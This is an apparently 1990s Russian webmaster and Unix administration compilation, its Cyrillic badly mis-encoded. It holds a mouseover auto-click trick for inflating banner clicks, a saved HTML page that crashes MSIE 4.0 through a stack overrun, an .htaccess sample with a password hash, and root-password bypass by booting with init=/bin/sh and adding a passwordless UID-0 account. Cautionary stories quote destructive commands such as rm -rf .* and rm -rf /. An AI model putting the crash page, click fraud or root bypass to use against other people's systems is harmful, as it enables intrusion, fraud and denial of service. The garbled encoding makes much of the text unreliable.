e_club >tets ‘амокликаемое письмо > Ѓыла идеЯ посылать в него сообщение когда мышкой над баннером проводЯт. > (Љогда баннер интересен, часто к нему курсор подводЯт) > Ќо что-то Я не допгр как это реализовать без hidden frame. ‚ правилах устанавливаешь, что у тебЯ _стандартный код_ твоей сетки содержит:

Љогда клиент будет снизу _пересекать_ мышью твою однопиксельную полоску будет автоклик, а чтоб клиента не напрЯгать - пускай твой http://koshelev.ru/cgi-bin/bannerOver возвращает код 204 No Content - т.е. _не переходить_ на линк а остатьсЯ на старой странице. &dD‘сылка на которую переходЯт автоматически&d@ „остаточно навести на эту ссылку мышь, и броузер пойдет по линку - без клика. &dDЏростые эксплойты&d@ MSIE 4.0. 4.01 can be crashed with a little help of the < EMBED > tag. <EMBED SRC=file://C|/A.ABOUT_200_CHARACTERS_HERE___________________> opens a dialog box and closes IE 4.0. the long file extension causes stack overrun. --------cut here and save as crashmsie.html--------------------- Trying to crash IE 4.0 <EMBED SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789> 40 80 160 170 180 190 200 </HTML> --------------------------------------------------------------- &dD‡акрытие каталогов длЯ внешних клиентов&d@ ‘оздаем в каталоге файл .htaccess такого содержаниЯ order deny,allow deny from all allow from polimos.ras.ru localhost AuthType Basic AuthName lenta.ru AuthUserFile /home/www/passwd # moshkow:1HrhNpfYnwTau стандартный crypt() require valid-user &dD‘м. так же&d@ Љонстантин Ћкраинец. “чебник по HTML из „убны і http://sundg0.jinr.dubna.su/wguide/ ”реймы и прочие дополнениЯ, возникшие в HTML 2.0 и HTML 3 і ../WEBMASTER/html20new.txt . &dDђемонт разрушенных файловых систем&d@ Џрактически единственное средство лечениЯ разрушений файловой системы во всех Unix - утилита &dDfsck&d@. …сли не лечит она, то дело ваше почти безнадежно. џ бы посоветовал в морг, но энтузиасты могут еще немного подергатьсЯ. &dD * LINUX * &d@ Џримечание: команды приведенные в примерах следует выполнЯть только внимательно взвесив возможные последствиЯ. Џоэтому в примерах реальные имена спецфайлов разделов жесткого диска заменены на &dD/dev/hd-name&d@ (в реальной жизни применЯетсЯ /dev/hda2, /dev/hdb3 /dev/sda1...) ’онкаЯ рихтовка fs &dDtune2fs&d@ позволЯет поменЯть настраиваемые параметры файловой системы -c max-mount-counts -m reserved-blocks-percentage и т.п. tune2fs -m 1 /dev/hd-name # найдет вам еще 50Mb свободного места, # и позволит учинить на оставшемсЯ клочке # свободного места катастрофическую фрагментацию ‘тандартное лечение файловой системы: fsck -y -c -f /dev/hd-name ”орсированное лечение с проверкой и "замещением" bad-блоков fsck -y -c -f /dev/hd-name # -y неинтерактивное лечение "yes" на все вопросы # -c найти bad-блоки readonly тестом и перенести в inod bad-блоков # -f форсировать проверку (игнорировать флаг "fs is clean" …сли погиб основной суперблок, добавить ключ -b 8193 или -b 16385 ... указав запасную копию. Ќомера запасных sb сообщает при разметке раздела утилита newfs. (‚ы конечно же сохранили ее листинг?) ђаспечатать размещение служебных структур fs и параметры суберблока могут команды &dDtune2fs -l&d@ и &dDdumpe2fs&d@ tune2fs /dev/hd-name dumpe2fs /dev/hd-name …сли погибли _все_ копии суперблока - последний шанс &dDmke2fs -S&d@ прописать _только_ структуры суперблоков и описатели групп, не трогаЯ самих данных mke2fs -S /dev/hd-name # Write superblock and group descriptors only fsck -y /dev/hd-name # сразу всед за этим запустить fsck € даже это еще не конец. „лЯ сильных духом остаетсЯ отладчик файловой системы &dDdebugfs&d@ man debugfs &dDЏоведение в авариной ситуации&d@ …стественно, целее будете, если загрузитесь в single-user mode „лЯ этого перехватить при загрузке LILO-промпт (Left-alt) € в команду загрузки добавить параметр single Lilo: &dDlinux single&d@ ‚ linux'овский single-user можно попасть только знаЯ пароль root. Ќе знаЯ паролЯ, надо грузитьсЯ так: Lilo: linux init=/bin/sh или даже так (если подготовлена rescue-дискета с файловой системой unix) Lilo: linux init=/bin/sh root=/dev/fd0H1440 Џеремонтировать корневой раздел из readonly в write mount -t ext2 -n -o remount,rw /dev/hd-root / ‘монтировать разрушенную fs, используаЯ альтернативный суперблок mount -t ext2 -o sb=8193,nocheck /dev/hd-name /mntname Џдробности (вы будете смеЯтьсЯ): man mount . &dDЊаксим Њошков. €стории из жизни администратора Unix, или ѓрабли&d@ &dD€сториЯ 1 со счастливым концом. €спорченный /etc/passwd&d@ &dD > Ћдин товарищ (не Я :), это из Љоми) решил своему root'y вместо положенного > /sbin/sh сделать /bin/ksh > „лЯ чего отредактировал /etc/passwd, но неудачно, ошибсЯ и назначил > /sbin/ksh. > Џробовали: > $ su root -c /sbin/sh > Ќе помогло. ’еперь он горько плачет и хакера зовет. > Њожешь помочь, или суровое: переустанови юних? &d@ ќто мы проходили. Љлассика. Џерво- наперво "никогда, Ќ€ЉЋѓ„Ђ не менЯй shell у суперюзера..." :-) 0. ‡апустить shell из-под root'а все-таки можно: su root -m -s /bin/sh Ќо если еще и пароль забыт, тогда - поможет загрузка в single user mode или загрузка с CD/floppy/tape 1. „ать команду df, посмотреть минор/мажор у девайса, на который монтируетсЯ корень, и затем почитать мануал по команде mknod # mkdev, mknode, mksf - создать специальный файл # или как там еще она называетсЯ и записать на бумажке команду, которой создаетсЯ спец-файл /dev/root (или куда там монтируетсЯ "/" 2. ‡агрузитьсЯ с инсталлЯционного стриммера/дискеты/CD. и там где уход на install/update/system maintance пойти на "system maintence" (это всего навсего shell root'овый) Ћсталось смонтировать /dev/root на /mnt и редактировать /mnt/etc/passwd &dD‡асада No 1&d@ ‘разу после загрузки мини-системы специальных файлов соответствующих жесткому диску нет (!). ‘делать его ручками - команда mknode уже записана на бумажке. &dD‡асада No 2&d@ ђедактор vi не запускаетсЯ (Ќет terminfo) Ќу и черт с ним. Џридумаешь что нибудь. Ќапример echo "toor::0:0:Yet another Super-User:/:" >> /mnt/etc/passwd ^^^^^^ обрати внимание что >> а не > (“гадай почему :-) а можно и так: PATH=$PATH:/mnt/bin:/mnt/usr/bin export PATH TERMINFO=/mnt/usr/lib/terminfo # или где он там Љороче - ты дома потренируйсЯ, а потом в Љоми напиши точные имена файлов и команд, а то боюсь необученный админ сможет промахнутьсЯ пару раз, а здесь промахиватьсЯ нельзЯ. Џриложение: Ћбход root passwd в Motorola Unix SVR4/88. 1. Џосмотреть major/minor длЯ / и /usr 104 0 /dev/root 104 3 /dev/dsk/m197_c0d0s3 2. ‡агрузка с ленты, уход на maintance . 3. Џодмонтировать разделы диска, соответствующие / и /usr, с восстановлением файловой системы (т.к. система была выключена некорректно при отсутствии root паролЯ). mkdir /mnt mknod /dev/rootn b 104 0 /etc/fs/ufs/fsck /dev/rootn mount -F ufs /dev/rootn /mnt аналогично длЯ /usr mknod /dev/usr3 b 104 3 /etc/fs/ufs/fsck /dev/usr3 mount -F ufs /dev/usr3 /mnt/usr 4. Ћтредактировать /etc/passwd, сделать беспарольного root echo "toor::0:1:Adm:/:/sbin/sh" >> /mnt/etc/passwd 5. Cменить корень root'у (будет в /mnt) chroot /mnt /sbin/sh 6. Ћбновить shadow pwconv ‚се. &dD€сториЯ 2 почти о том же. €спорченный /etc/fstab&d@ Date: 20 Apr 1997 From: Bernshtam Pavel (barnshte@CS.bgu.ac.il) “ менЯ тоже было - запортил Я /etc/fstab и сделал reboot не заметив ошибки - бабах - поднимаетсЯ (а это был Axil с SunOS 4.1) в single user. Я делаю ls - Command not found - понЯтно - не замоунтил /usr посмотрел Я на другом SUN'е что есть в /sbin - нашел mount, обрадовалсЯ - сделал /sbin/mount /usr. …сть VI! ЏомучалсЯ пока установил нужный set TERM с полчаса - запустил VI. открываю fstab - фигнЯ со строками (вот оно - не работайте в PICO, учите VI !!!), исправил, save'лю - а root partition то READ ONLY !!! „елаю stop-A. ‘лава богу, посоветовали мне, что в boot-мониторе можно сделать b -rw (замаунтить с write), после этого Я повторил всю процедуру с mount и VI и исправил /etc/fstab. а... еще забыл - VI не запускалсЯ пока Я /var не замаунтил, т.к /tmp - линк на /var/tmp , а VI без /tmp не идет. /* а на Linux специальнаЯ команда есть - перемонтироватьсЯ на read-write - ее из single-user-mode можно выполнить mount -n -o remount / */ &dDЉоманда rm -rf в SCO&d@ ‚виду того, что под шаблон ".*" подходит каталог ".." Ќ€ЉЋѓ„Ђ Ќ… „…‹Ђ‰’… ЉЋЊЂЌ„› rm -r .* (Ѓольшинство unix'ов прощают подобную ошибку, но Ќ… ‚‘…) &dD From: Џавел ‘еверов "... решил Я на нашем SCO-шном сервере с Oraclовской базой расчистить немного свободного места на диске..." # cd /usr/tmp # rm -rf * глЯжу, а там всЯкий хлам осталсЯ /usr/tmp/.X11-0 ну и т.п. Ђ Я тогда # rm -rf .* # Ћ‰! # du ldd: Can not open file # df ldd: Can not open file # ls -al ldd: Can not open file &d@ . . . “ этой истории грустный конец. ‚ы уже догадались, что /usr/tmp/.* содержит в себе /usr/tmp/.. Џосле reboot'а машина, не найдЯ каталога /usr уже не ожила. &dD“даленный доступ или "‡апасной ключ от сейфа лежит в сейфе"&d@ •орошаЯ штука, Unix + TCP/IP - можно отконфигурить машину у черта на куличках не вставаЯ с рабочего места и даже не выходЯ из дома. &dD€сториЯ 1.&d@ ‚от и Я однажды менЯл то ли IP-адрес, то ли роутинг на удаленной машине... Љороче - промахнулсЯ, сказал ifconfig eth0 down ‚от собственно и все. ‘казать ifconfig eth0 NEW-IP было уже некому. ‚ы конечно догадались, что _ЌЂ„Ћ Ѓ›‹Ћ_ одной строкой писать ifconfig eth0 down ; ifconfig eth0 NEW-IP up ; route add ... &dD€сториЯ 2.&d@ ‡ахотелось повысить уровень security. Џишем в /etc/hosts.deny ALL:ALL в /etc/hosts.allow ALL:193.263.12.13 ^^^ вроде бы маленькаЯ ошибочка, цифры переставить, а нельзЯ - Я уже успел отлогинитьсЯ. &dD“даленный "доступ" или "Љлюча вообще нет"&d@ Џовис у нас однажды сервер, надо reset нажать, перегрузить, а комната заперта, и ключи уже унесли. € telnet'ом не войдешь - некуда. ‚ырубили свет на всем этаже, включили вновь - voila! &dDЌоваЯ /lib/libc.so - апгрейд LIB C&d@ Linux. 1993 год. Џотребовалось подменить LibC. Ќу, вперед, делов-то - старую передвинуть, новую - на ее место. cd lib mv libc.so libc.so-old mv libc.so-new libc.so ldd: Can not execute, shared library not found Finish. Џришлось грузитьсЯ с дискеты, монтировать hd. Ќо, как это ни смешно, в следующий раз те же команды, записанные в одну строку, сработали. €ли библиотечка в кэше оказалась... ’емна вода в Linuxе. ‚прочем, файлы из каталога /sbin - обычно staticaly-linked - им длЯ работы разделЯемаЯ libc без надобности. &dD€сториЯ 1. Trusted mode - безопасность превыше всего&d@ ‚ HP-UX новички администраторы очень любЯт sam'ом поиграть - GUI, мышиный интерфейс - администрируй на здоровье. ‚от только читать сообщениЯ надо - а они по-английски все. Ћчень легко, одним "Ok" в SAM включаетсЯ перевод системы в trusted режим. ‚ключают, и не замечают. Ђ замечают через пару дней, когда с трех раз не угадают пароль root. ‚ trusted режиме логин после этого блокируетсЯ совсем, а другого юзера Џ…ђ…„ ќ’€Њ завести - не догадываютсЯ. Љак всегда - нас спасет single user mode: перехват загрузки в prompt IPL и затем IPL> hpux -is Ђ затем запуск sam. € переконвертировать систему в "untrusted" # mount -a # sam Ќо если вы ухитрились еще и пароль на boot включить - то помогайте себе сами. &dD€сториЯ 2. Security class C2: о том же, но в SCO&d@ Security class C2 - это повышеннаЯ безопасность. € повышенный геморрой длЯ пользователей. € длЯ администратора - тоже. Џривелось нам позвонить на защищенную SCO машину из Њосквы в Џитер, по модему. ‘корости getty с первого раза подобрать не смогли, на логин прорывалсЯ 6-битный мусор, после третьей попытки вместо getty Login мы увидели "Intruder attempts, tty line /dev/modem disabled". —ерез пару недель хозЯин машины вернулсЯ в Џитер и вернул getty. &dDScreen-сейвер и кнопка Enter&d@ Љогда screen-saver гасит экран, что вы нажимаете? Ќе знаю, как остальные, а Я жму клавишу CTRL. Ћдин мой знакомый решил почистить каталог /tmp. €з-под root'а. набирает он rm -rf /tmp/*, точнее хочет набрать, поскольку в момент rm -rf /_ звонит телефон и его куда-то вызывают. —ерез час он вернулсЯ, увидел погашенный экран, и нажал _свою_ любимую клавишу. “гадайте, какую? .